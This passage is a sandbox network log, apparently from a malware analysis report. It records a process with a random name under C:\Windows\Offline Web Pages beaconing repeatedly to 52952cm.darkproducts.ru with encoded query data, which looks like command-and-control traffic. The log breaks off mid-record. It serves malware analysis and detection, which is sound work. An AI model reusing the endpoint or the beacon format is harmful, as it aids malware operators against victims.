Jan 3, 2025 17:03:43.119235992 CET	2264	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru
Jan 3, 2025 17:03:43.794249058 CET	934	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:03:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nrczQQeTtFm0bihiwC806rQi6nnhrVnehTyd%2Fm7DFfs200THbRhBPQS%2Fef7GvG81Yi0mLZApRw5%2BvsynzyIwEuS26DZVzHdDO5HQ5WRhqFeZZt9GQ4gQNBqC4PWR0Md47YVuBx1WNK1Lrw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc4387509b3efa7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1999&min_rtt=1999&rtt_var=999&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2264&delivery_rate=0&cwnd=159&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49995	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:03:48.823730946 CET	2237	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=d1nIiojIzEzN2kTOlRGNzIWYlVGZmBjYilTZlRDO5IGZ5gTY4UjIsIyN3MWMklTOxUjM3IGM4cjN3YzM4EzYzYWOzMDMjVzMzYWMkNGOzQDNiojI4gDM4cTN1UGNldDOmRGNyQWO1QWNxMWO1ATZiRGOiBjIsISN4EmMmNGNzMTO3kzY1cDMxMTOiRjMhVGN2UTZwQmYkJjMiNmMxYWZiojI5ETOhF2YmdjM5YjZmljZ4ATNiJzNwcTOkRDNlZjM0AjI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru
Jan 3, 2025 17:03:49.547957897 CET	933	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:03:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vfBgDPHlbchfHS0tneAo3T7ytYuNgtztd98g43qE%2FQ85gU1wTrsIvypA3ZFBrF9P%2FymlpFCd16PHBr0HJQ9rJ8U92YAT6cJ%2BEqGY0nsGWQyhgYuK7XCQl5Rd43%2FYmoojTsCITYCX62D%2FiQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc43898af04425d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1797&min_rtt=1797&rtt_var=898&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2237&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye
Jan 3, 2025 17:03:49.677324057 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49996	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:03:54.696314096 CET	2264	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru
Jan 3, 2025 17:03:55.391333103 CET	935	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:03:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8Mc1lnj3wswAhIlxQ745A5MEhp%2FFg43nODlcQ7e3T1%2BvI22Gma1nLh19SPMFtogNSwMHLMp2bZ5BiAJsq2JHFfOvFZDWxZAJsoa3AAznOM81Ejmwt5VYVPBqXBOBUGv0xKo1KgS8N%2BvCdg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc438bd8d897ca5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2001&min_rtt=2001&rtt_var=1000&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2264&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49997	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:04:00.417098045 CET	2288	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru Connection: Keep-Alive
Jan 3, 2025 17:04:01.137710094 CET	940	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:04:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JQ72zR7prq%2FWbCkz%2Bah%2FLjGXER33fsZWxtsinpopAbq8UvRfH6gD%2FfyWNX8lCjRqQI8wRx6YkxxdL1p1a7sBnOKvwe%2Bvt1xeKEqyIbt6n7jGFltUNB1mhqSUKQrSmdVX5YT4ilzE2mO%2FkQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc438e14852c3ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1680&min_rtt=1680&rtt_var=840&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2288&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49998	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:04:06.162981033 CET	2264	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru
Jan 3, 2025 17:04:06.843265057 CET	935	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:04:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ebHZLRE6xl6LD76%2BMIgPEp%2BU%2FHx3e0K6wU0C3vhgovYhlpPbqjCDFw5%2BGyeph6gYDH8lQ5qL78q0PAgWygV%2FRbKdHDE491cPqObnxrnKWgCL37NKVLeSkDXhnRGKH%2B3VcsLZAigmLC62Wg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc439051bf972a5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1999&min_rtt=1999&rtt_var=999&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2264&delivery_rate=0&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye
Jan 3, 2025 17:04:06.976847887 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49999	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:04:12.127033949 CET	2288	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru Connection: Keep-Alive
Jan 3, 2025 17:04:12.817615032 CET	936	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:04:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7weTBJ5DCb6nyADY2P0Ix78IFOpoEn8UPBRW5FvdpRRvxbfveU3iUDJBiP9yIrEufExjKelFZaBSyGvzMs3tT%2FCgu8WFG1piALvOLJvDCYWXbCi08HW%2BTtdOir8eXtLPRcvhUb%2B4%2FtLDvQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc4392a58d542bd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1734&min_rtt=1734&rtt_var=867&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2288&delivery_rate=0&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	50000	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:04:17.834363937 CET	2288	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru Connection: Keep-Alive
Jan 3, 2025 17:04:18.562685013 CET	933	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:04:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C8INBot5tJMugzjxnWTOA72fkLLBDRM4V2vUxXplYkTwMH9PBqFiLbUQAATkibGU9uWEcbK2HNFthEuFy5%2BApLqLTPrl2ETSliE09pVkZNrLg1GA7%2FJ7uHP3iBV4pWmoczN61jyttVDMpA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 